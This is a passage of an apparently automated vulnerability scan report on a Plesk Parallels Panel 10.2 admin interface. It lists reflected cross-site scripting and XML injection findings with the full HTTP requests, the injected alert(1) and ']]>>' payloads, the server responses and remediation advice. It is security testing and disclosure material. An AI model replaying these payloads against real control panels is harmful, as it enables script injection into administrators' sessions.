HTTP/1.1 200 OK Expires: Mon, 24 Oct 2011 15:29:41 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 15:29:41 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Content-Type: application/json Date: Sat, 24 Sep 2011 15:29:41 GMT Server: sw-cp-server Content-Length: 870
{"pager":{"pageCount":0,"itemCountPerPage":25,"first":1,"current":1,"last":0,"pagesInRange":{"1":1},"firstPageInRange":1,"lastPageInRange":1,"currentItemCount":0,"totalItemCount":0,"firstItemNumber":1,"lastItemNumber":0},"state":{"sortField":"name","sortDirection":"up","currentPage":1,"itemsPerPage":25,"searchFilters":{"name":{"searchText":"xss10344<img src=a onerror=alert(1)>4df115c2fd8"}},"forceShowSearch":false},"data":[],"locale":{"recordsTotal":"%%total%% items total","pages":"Pages","firstPage":"First","lastPage":"Last","numberOfItemPerPage":"Number of entries per page","hideSea ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/health/
Issue detail
The value of the group request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 619d3'%3balert(1)//7a686082d0f was submitted in the group parameter. This input was echoed as 619d3';alert(1)//7a686082d0f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /admin/health/?group=Services619d3'%3balert(1)//7a686082d0f HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=home
Response
HTTP/1.1 200 OK Expires: Sun, 23 Oct 2011 19:00:27 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 23 Sep 2011 19:00:27 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=health; path=/ Content-type: text/html Date: Fri, 23 Sep 2011 19:00:27 GMT Server: sw-cp-server Content-Length: 7544
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... el.Health.Toolbar.restoreDefaultsHandler"}] }) ] });
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/reseller@3/backup/create/
Issue detail
The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73697"><script>alert(1)</script>b28884795cf566dfd was submitted in the email parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /plesk/reseller@3/backup/create/?forgery_protection_token=b7282d2a0991a8873c80d06b804622ce&cmd=update&lock=true&previous_page=%0d&wizaction=%0d&prefix=3434&comment=Reseller+account++backup.%0d%0aCreation+date%3a+Sep+24%2c+2011+10%3a28+AM&split_backup=false&repository=local&email=%0d73697%22%3e%3cscript%3ealert%281%29%3c%2fscript%3eb28884795cf566dfd&content=configuration&suspend=false HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/create/ Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home
Response
HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 15:29:17 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=home; path=/ Date: Sat, 24 Sep 2011 15:29:17 GMT Server: sw-cp-server Content-Length: 10646
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of the wizard request parameter is copied into the HTML document as plain text between tags. The payload dc70d<script>alert(1)</script>e85ee75d431ab8ef6 was submitted in the wizard parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /plesk/reseller@3/custom-buttons/custom-button@new/properties/?forgery_protection_token=b7282d2a0991a8873c80d06b804622ce&cmd=update&lock=true&previous_page=%0d&wizstep=1&wizard=%2fplesk%2freseller@3%2fcustom-buttons%2fcustom-button@new%2fproperties%2fdc70d%3cscript%3ealert%281%29%3c%2fscript%3ee85ee75d431ab8ef6&wizaction=finish&text=%0d&place=domain&sort_key=100&fname=%0d&url=%0d&conhelp=%0d&private=true&cb_id=0 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/custom-buttons/custom-button@new/properties/ Cookie: custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home
Response
HTTP/1.1 400 Bad Request Last-Modified: Sat, 24 Sep 2011 15:29:04 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-type: text/plain; charset=utf-8 Date: Sat, 24 Sep 2011 15:29:04 GMT Server: sw-cp-server Content-Length: 929
Additionally, an exception has occurred while trying to report this error: PleskBadURIException Invalid URI: /plesk/reseller@3/custom-buttons/custom-button@new/properties/dc70d<script> ...[SNIP]...
The value of the wizard request parameter is copied into the HTML document as plain text between tags. The payload 1fcfb<script>alert(1)</script>840178da2544c7d81 was submitted in the wizard parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /plesk/reseller@3/report/layout@2/auto@new/properties/?forgery_protection_token=b7282d2a0991a8873c80d06b804622ce&cmd=update&lock=true&previous_page=%0d&wizstep=1&wizard=%2fplesk%2freseller@3%2freport%2flayout@2%2fauto@new%2fproperties%2f1fcfb%3cscript%3ealert%281%29%3c%2fscript%3e840178da2544c7d81&wizaction=%0d&recipient=2&select=current&auto=604800&id=0 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@new/properties/ Cookie: reseller_report__report_id=2; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools
Response
HTTP/1.1 400 Bad Request Last-Modified: Sat, 24 Sep 2011 15:31:21 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-type: text/plain; charset=utf-8 Date: Sat, 24 Sep 2011 15:31:21 GMT Server: sw-cp-server Content-Length: 1021
Additionally, an exception has occurred while trying to report this error: PleskBadURIException Invalid URI: /plesk/reseller@3/report/layout@2/auto@new/properties/1fcfb<script> ...[SNIP]...
3. XML injectionpreviousnext There are 189 instances of this issue:
XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.
This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.
Issue remediation
The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: < and >.
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /admin]]>>/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: psaContext=dashboard; PHPSESSID=af8b59293ecdef34dd27eb4277f6c86f; locale=en-US
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:01:37 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer-service-plan/create
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /admin]]>>/customer-service-plan/create HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:20:30 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer-service-plan/list
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /admin]]>>/customer-service-plan/list?context=service-plans HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; BarExpanded=True; psaContext=customers
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:14:26 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer/create
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /admin]]>>/customer/create HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list?context=customers Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:58:53 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer/list
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /admin]]>>/customer/list?context=customers HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=home
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:59:07 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer/list/reset-search/true/
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /admin]]>>/customer/list/reset-search/true/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:20:04 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/domain/list
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /admin]]>>/domain/list?context=domains HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/?group=Services Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=health
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:06:14 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/health/
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /admin]]>>/health/?group=Services HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=home
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:01:24 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/health/parameters/group/Services
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/home
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /admin]]>>/home HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=b6e4a9281ca7faad89475e4d77b34296; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:01:37 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/home/admin%27
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /admin]]>>/home/admin%27 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:59:37 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/home/reseller
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /admin]]>>/home/reseller HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/preferences?context=interface-pref Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; psaContext=interface-pref; BarExpanded=True
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 24 Sep 2011 15:38:11 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/reseller/list
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /admin]]>>/reseller/list?context=resellers HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=customers
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:14:22 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/reseller/list/reset-search/true/
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /admin]]>>/reseller/list/reset-search/true/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:20:14 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/reseller/personal-info/
Issue detail
